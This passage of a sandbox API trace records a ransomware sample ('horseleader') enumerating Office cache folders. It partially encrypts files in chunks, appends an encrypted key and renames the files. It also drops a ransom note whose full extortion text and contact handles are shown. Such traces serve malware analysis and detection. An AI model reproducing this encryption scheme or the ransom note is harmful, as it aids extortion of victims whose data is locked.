"c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.horseleader")) returned 1 [0221.368] GetProcessHeap () returned 0x780000 [0221.368] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0221.368] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69dde270, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x69dde270, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa8191670, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0221.368] lstrcmpiW (lpString1="setup.exe", lpString2="Windows") returned -1 [0221.368] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0221.368] StrStrIW (lpFirst="setup.exe", lpSrch=".horseleader") returned 0x0 [0221.368] lstrcmpW (lpString1="setup.exe", lpString2="#Decrypt#.txt") returned 1 [0221.369] lstrcmpW (lpString1="setup.exe", lpString2="_uninstalling_.png") returned 1 [0221.369] lstrlenW (lpString=".testttjffg") returned 11 [0221.369] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe", lpSrch=".testttjffg") returned 0x0 [0221.369] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0221.369] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0221.369] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all 
users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0221.369] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0221.369] StrStrW (lpFirst="setup.exe", lpSrch=".txt") returned 0x0 [0221.369] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1377656) returned 1 [0221.369] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.369] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.403] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0221.403] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.403] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa5abc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.403] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.102] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.102] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.102] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x14b578, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.102] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.154] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.154] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.155] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.155] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0222.155] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0222.155] CloseHandle (hObject=0x21c) returned 1 [0222.155] GetProcessHeap () returned 0x780000 [0222.155] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0222.155] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.horseleader") returned 88 [0222.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.horseleader")) returned 1 [0222.156] GetProcessHeap () returned 0x780000 [0222.156] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0222.156] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0222.156] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0222.156] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0222.157] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0222.157] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0222.157] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0222.157] lstrlenW (lpString=".testttjffg") returned 11 [0222.157] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0222.157] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.157] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0222.157] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0222.157] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0222.157] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0222.158] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=16683) returned 1 [0222.158] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x412b, lpOverlapped=0x0) returned 1 [0222.239] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffbed5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.239] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x412b, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x412b, lpOverlapped=0x0) returned 1 [0222.254] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.254] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0222.254] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, 
lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0222.254] CloseHandle (hObject=0x21c) returned 1 [0222.255] GetProcessHeap () returned 0x780000 [0222.255] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0222.255] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0222.255] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0222.256] GetProcessHeap () returned 0x780000 [0222.256] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0222.256] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0222.256] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0222.256] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0222.256] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: 
"c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0222.257] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0222.257] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0222.259] lstrlenA (lpString="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") returned 1368 [0222.259] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0222.259] CloseHandle (hObject=0x1cc) returned 1 [0222.259] GetProcessHeap () returned 0x780000 [0222.259] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0222.259] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0222.259] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0222.259] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C") returned 66 [0222.259] lstrcmpW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0222.259] lstrcmpW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0222.259] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0222.259] GetProcessHeap () returned 0x780000 [0222.259] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0222.259] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*") returned 68 [0222.259] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0222.410] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0222.410] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\.") returned 68 [0222.410] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0222.410] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0222.410] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0222.410] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0222.410] lstrlenW (lpString=".testttjffg") returned 11 [0222.410] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0222.410] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.410] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0222.410] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0222.410] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0222.410] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0222.410] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\..") returned 69 [0222.411] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0222.411] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0222.411] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0222.411] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0222.411] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0222.411] lstrlenW (lpString=".testttjffg") returned 11 [0222.411] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0222.411] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.411] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0222.411] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0222.411] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5ed9630, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xe5ed9630, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x4655d500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0222.411] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Windows") returned -1 [0222.411] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0222.411] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".horseleader") returned 0x0 [0222.411] lstrcmpW (lpString1="Office32WW.msi", lpString2="#Decrypt#.txt") returned 1 [0222.411] lstrcmpW (lpString1="Office32WW.msi", lpString2="_uninstalling_.png") returned 1 [0222.411] lstrlenW (lpString=".testttjffg") returned 11 [0222.411] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpSrch=".testttjffg") returned 0x0 [0222.412] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.412] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 
[0222.412] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0222.412] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0222.412] StrStrW (lpFirst="Office32WW.msi", lpSrch=".txt") returned 0x0 [0222.412] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1992192) returned 1 [0222.412] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.413] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.419] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.419] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.419] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf0b00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.419] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.427] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | 
out: lpNewFilePointer=0xffffffff) returned 1 [0222.428] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.428] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1e1600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.428] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.431] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.431] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.432] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.432] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0222.432] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, 